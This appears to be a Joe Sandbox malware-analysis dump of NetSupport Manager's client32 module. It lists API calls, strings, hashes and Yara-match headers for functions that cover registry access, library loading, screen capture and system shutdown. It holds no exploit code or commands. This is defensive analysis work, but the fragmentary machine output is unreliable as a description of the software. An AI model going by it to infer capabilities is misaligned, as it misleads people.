                                                                                                                                                                • Opcode ID: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                                                                                                • Instruction ID: 724175da6b3b5eb63f60f43096b8b9410b0df93e13cce3f4766159a849acac97
                                                                                                                                                                • Opcode Fuzzy Hash: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                                                                                                • Instruction Fuzzy Hash: 3D11C675A0061AAFE700CF65CD85B5BF7A9FB88714F010129E829E3340F7359808CB92
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068A12
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                • String ID: ??CTL32.DLL
                                                                                                                                                                • API String ID: 1029625771-2984404022
                                                                                                                                                                • Opcode ID: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                                                                                                • Instruction ID: 38d720fc7c26638894156a2f8924bac31edb6b50614c34829f37a9a02c5b1e22
                                                                                                                                                                • Opcode Fuzzy Hash: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                                                                                                • Instruction Fuzzy Hash: 5831F5B2A04781DFE711CF59DC40B5AF7E8FB45724F0482AAE92897380E735A900CB92
                                                                                                                                                                APIs
                                                                                                                                                                • GetDriveTypeA.KERNEL32(?), ref: 11026B6D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DriveType
                                                                                                                                                                • String ID: ?:\
                                                                                                                                                                • API String ID: 338552980-2533537817
                                                                                                                                                                • Opcode ID: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                                                                                                • Instruction ID: c0198090b602517e4922a9d0df48f1c050a77905515f879100581957a4b6d58d
                                                                                                                                                                • Opcode Fuzzy Hash: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                                                                                                • Instruction Fuzzy Hash: 64F09065C083DA2AEB23DE608844596BFE84B463A8F5488D9DCE887541D165E1C58791
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
                                                                                                                                                                  • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                                                                                                Strings
                                                                                                                                                                • Error %d Opening regkey %s, xrefs: 110ED1CA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenwvsprintf
                                                                                                                                                                • String ID: Error %d Opening regkey %s
                                                                                                                                                                • API String ID: 1772833024-3994271378
                                                                                                                                                                • Opcode ID: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                                                                                                • Instruction ID: 33cf1931661e2960d377c619dd89904b97ea319b13ae6f8f8dcb9591a9c6775e
                                                                                                                                                                • Opcode Fuzzy Hash: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                                                                                                • Instruction Fuzzy Hash: 60E0927A6012187FD210961B9C89F9BBB2DDB856A4F000069FD1487201C972EC1082B0
                                                                                                                                                                APIs
                                                                                                                                                                • RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                                                                                                  • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                                                                                                Strings
                                                                                                                                                                • Error %d closing regkey %x, xrefs: 110ED17D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Closewvsprintf
                                                                                                                                                                • String ID: Error %d closing regkey %x
                                                                                                                                                                • API String ID: 843752472-892920262
                                                                                                                                                                • Opcode ID: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                                                                                                • Instruction ID: 72b2cf3cdd4b8fd577e25b07e2838f9a8e734d144b1f96517ba84771a8eadcbb
                                                                                                                                                                • Opcode Fuzzy Hash: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                                                                                                • Instruction Fuzzy Hash: 4EE08679A022126BD3289A1EAC18F5BB6E8DFC4300F1604ADF850C3240DA70D8018664
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,02FBB818,?,?,?,00000100,?,?,00000009), ref: 111463E9
                                                                                                                                                                  • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                • String ID: NSMTRACE
                                                                                                                                                                • API String ID: 4133054770-4175627554
                                                                                                                                                                • Opcode ID: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                                                                                                • Instruction ID: cf49eb18fee32400038a48a9d82a087192b912de878353ac6c822cd252c7dc11
                                                                                                                                                                • Opcode Fuzzy Hash: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                                                                                                • Instruction Fuzzy Hash: 50D05EB520033BCFDB489F7995B4269F7EAAB4CA1D3540075E469C2A07EBB0D848C714
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                • String ID: psapi.dll
                                                                                                                                                                • API String ID: 1029625771-80456845
                                                                                                                                                                • Opcode ID: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                                                                                                • Instruction ID: d2f0b82a95d6fc878682dccaf19b7a180456f678ee46f3fe844c8dbdc6f5fb44
                                                                                                                                                                • Opcode Fuzzy Hash: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                                                                                                • Instruction Fuzzy Hash: C9E001B1A11B248FC3B4CF3AA844642FAF0BB18A103118A3ED4AEC3A00E330A5448F80
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102EF80,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 11014F8E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                • String ID: nslsp.dll
                                                                                                                                                                • API String ID: 1029625771-3933918195
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 11074E1F
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11194245,?), ref: 11074E89
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1654520187-0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1105FD93
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1105FDA8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1338273076-0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _malloc_memmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1183979061-0
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 110883EF
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalInitializeSection_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 453477542-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
                                                                                                                                                                • ExtractIconExA.SHELL32(?,00000000,00270311,000E03C5,00000001), ref: 11144498
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExtractFileIconModuleName
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3911389742-0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                                                                                                • __lock_file.LIBCMT ref: 11163DFE
                                                                                                                                                                  • Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE
                                                                                                                                                                • __fclose_nolock.LIBCMT ref: 11163E09
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2800547568-0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7
                                                                                                                                                                  • Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA
                                                                                                                                                                • GetLastError.KERNEL32(?,02FBB818,000000FF,?), ref: 11144ED5
                                                                                                                                                                • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,02FBB818,000000FF,?), ref: 11144EE5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3768737497-0
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010774
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LockitLockit::_std::_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3382485803-0
                                                                                                                                                                APIs
                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,76968400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: QueryValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3660427363-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FACED
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                • API ID: InformationToken
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4114910276-0
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9
                                                                                                                                                                  • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                                                                                                • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 328603210-0
                                                                                                                                                                • API ID: __waccess_s
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4272103461-0
                                                                                                                                                                • API ID: __fsopen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3646066109-0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11088910: IsWindow.USER32(111305BC), ref: 1108892C
                                                                                                                                                                  • Part of subcall function 11088910: IsWindow.USER32(?), ref: 11088946
                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 1100773A
                                                                                                                                                                • SetCursor.USER32(00000000), ref: 11007741
                                                                                                                                                                • GetDC.USER32(?), ref: 1100776D
                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1100777A
                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007884
                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 11007892
                                                                                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 110078A6
                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 110078B3
                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 110078C5
                                                                                                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 110078F1
                                                                                                                                                                  • Part of subcall function 11002250: DeleteObject.GDI32(?), ref: 11002261
                                                                                                                                                                  • Part of subcall function 11002250: CreatePen.GDI32(?,?,?), ref: 11002288
                                                                                                                                                                  • Part of subcall function 11005AC0: CreateSolidBrush.GDI32(?), ref: 11005AE7
                                                                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1100791B
                                                                                                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 11007930
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 1100793D
                                                                                                                                                                • DeleteDC.GDI32(?), ref: 1100794A
                                                                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007967
                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 11007996
                                                                                                                                                                • CreatePen.GDI32(00000002,00000001,00000000), ref: 110079A1
                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 11007A92
                                                                                                                                                                • GetSysColor.USER32(00000004), ref: 11007AA0
                                                                                                                                                                • LoadBitmapA.USER32(00000000,00002EEF), ref: 11007AB7
                                                                                                                                                                  • Part of subcall function 11142370: GetObjectA.GDI32(11003CF6,00000018,?), ref: 11142383
                                                                                                                                                                  • Part of subcall function 11142370: CreateCompatibleDC.GDI32(00000000), ref: 11142391
                                                                                                                                                                  • Part of subcall function 11142370: CreateCompatibleDC.GDI32(00000000), ref: 11142396
                                                                                                                                                                  • Part of subcall function 11142370: SelectObject.GDI32(00000000,00000000), ref: 111423AE
                                                                                                                                                                  • Part of subcall function 11142370: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 111423C1
                                                                                                                                                                  • Part of subcall function 11142370: SelectObject.GDI32(00000000,00000000), ref: 111423CC
                                                                                                                                                                  • Part of subcall function 11142370: SetBkColor.GDI32(00000000,?), ref: 111423D6
                                                                                                                                                                  • Part of subcall function 11142370: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 111423F3
                                                                                                                                                                  • Part of subcall function 11142370: SetBkColor.GDI32(00000000,00000000), ref: 111423FC
                                                                                                                                                                  • Part of subcall function 11142370: SetTextColor.GDI32(00000000,00FFFFFF), ref: 11142408
                                                                                                                                                                  • Part of subcall function 11142370: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 11142425
                                                                                                                                                                  • Part of subcall function 11142370: SetBkColor.GDI32(00000000,?), ref: 11142430
                                                                                                                                                                  • Part of subcall function 11142370: SetTextColor.GDI32(00000000,00000000), ref: 11142439
                                                                                                                                                                  • Part of subcall function 11142370: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 11142456
                                                                                                                                                                  • Part of subcall function 11142370: SelectObject.GDI32(00000000,00000000), ref: 11142461
                                                                                                                                                                  • Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
                                                                                                                                                                  • Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2
                                                                                                                                                                • _memset.LIBCMT ref: 11007B17
                                                                                                                                                                • _swscanf.LIBCMT ref: 11007B84
                                                                                                                                                                  • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 11007BB5
                                                                                                                                                                • _memset.LIBCMT ref: 11007BDC
                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 11007BEF
                                                                                                                                                                • GetObjectA.GDI32(00000000), ref: 11007BF6
                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 11007C03
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 11007D46
                                                                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 11007D83
                                                                                                                                                                • GetSystemMetrics.USER32(00000001), ref: 11007DA3
                                                                                                                                                                • GetSystemMetrics.USER32(00000000), ref: 11007DC0
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007E10
                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 110078D6
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                  • Part of subcall function 110955C0: GetSystemMetrics.USER32(0000004C), ref: 110955CE
                                                                                                                                                                  • Part of subcall function 110955C0: GetSystemMetrics.USER32(0000004D), ref: 110955D7
                                                                                                                                                                  • Part of subcall function 110955C0: GetSystemMetrics.USER32(0000004E), ref: 110955DE
                                                                                                                                                                  • Part of subcall function 110955C0: GetSystemMetrics.USER32(00000000), ref: 110955E7
                                                                                                                                                                  • Part of subcall function 110955C0: GetSystemMetrics.USER32(0000004F), ref: 110955ED
                                                                                                                                                                  • Part of subcall function 110955C0: GetSystemMetrics.USER32(00000001), ref: 110955F5
                                                                                                                                                                • UpdateWindow.USER32(?), ref: 11007E42
                                                                                                                                                                • SetCursor.USER32(?), ref: 11007E4F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText_memset$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdate_malloc_strrchr_swscanfwsprintf
                                                                                                                                                                • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 2635354838-2303488826
                                                                                                                                                                APIs
                                                                                                                                                                • InterlockedIncrement.KERNEL32(111ED4B8), ref: 1102D382
                                                                                                                                                                • Sleep.KERNEL32(0000EA60), ref: 1102D3A5
                                                                                                                                                                  • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000501,1102D590,00000000), ref: 11026F72
                                                                                                                                                                  • Part of subcall function 11026F20: Sleep.KERNEL32(00000032,?,1102D590,00000001), ref: 11026F76
                                                                                                                                                                  • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 11026F97
                                                                                                                                                                  • Part of subcall function 11026F20: WaitForSingleObject.KERNEL32(00000000,00000032,?,1102D590,00000001), ref: 11026FA2
                                                                                                                                                                  • Part of subcall function 11026F20: CloseHandle.KERNEL32(00000000,1102E392,?,1102D590,00000001), ref: 11026FB4
                                                                                                                                                                  • Part of subcall function 11026F20: FreeLibrary.KERNEL32(00000000,00000000,00000000,1102E392,?,1102D590,00000001), ref: 11026FE1
                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000020,00000000,00000000), ref: 1102D3AB
                                                                                                                                                                • SetPriorityClass.KERNEL32(00000000), ref: 1102D3B2
                                                                                                                                                                • SetEvent.KERNEL32(00000270), ref: 1102D3E7
                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 1102D4D8
                                                                                                                                                                • PostThreadMessageA.USER32(00001CF4,00000000,00000000,00000000), ref: 1102D5BC
                                                                                                                                                                • CloseHandle.KERNEL32(0000029C), ref: 1102D815
                                                                                                                                                                • _free.LIBCMT ref: 1102D825
                                                                                                                                                                • _free.LIBCMT ref: 1102D841
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1102D8D4
                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 1102D8E1
                                                                                                                                                                • _memset.LIBCMT ref: 1102D983
                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 1102D99B
                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,00000010,?,?,?,00000000,00000000), ref: 1102D9C2
                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 1102D9C9
                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 1102DAB7
                                                                                                                                                                • Sleep.KERNEL32(00002710), ref: 1102DABE
                                                                                                                                                                • ExitWindowsEx.USER32(00000006,00000000), ref: 1102DAD4
                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 1102DAE0
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 1102DAF4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$File$CloseExitFindMessagePostThread$HandleProcessWindows_free$AttributesClassCurrentEventFirstFreeIncrementInterlockedLibraryModuleNameNextObjectPrioritySingleWait_memset
                                                                                                                                                                • String ID: *.*$562258$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Error. Multiple Terminate. $Finished terminate$HookDirectSound$Stop tracing, almost terminated$TermUI...$Termed$Terminate Client32 (err=%d)$Unload Hook$Warning. Unprocessed notify NC_CMD, cmd=%d$Warning. Unprocessed notify, type=%d$delete gMain.ev$deleted ipc$pSlash$remove smartcard devices
                                                                                                                                                                • API String ID: 2369127096-1985248231
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110AC830: LoadLibraryA.KERNEL32(Crypt32.dll,00000000,?,110AD605,59FD48C0,?,?,?,?,1118484B,000000FF,?,110F4601,00000000,00000000,?), ref: 110AC870
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(00000000,CertCreateCertificateContext), ref: 110AC88C
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(00000000,CertFreeCertificateContext), ref: 110AC899
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(?,CertGetNameStringA), ref: 110AC8A6
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(?,CertGetValidUsages), ref: 110AC8B3
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(00000000,CertOpenStore), ref: 110AC8C0
                                                                                                                                                                  • Part of subcall function 110AC830: GetProcAddress.KERNEL32(?,CertOpenSystemStoreA), ref: 110AC8CD
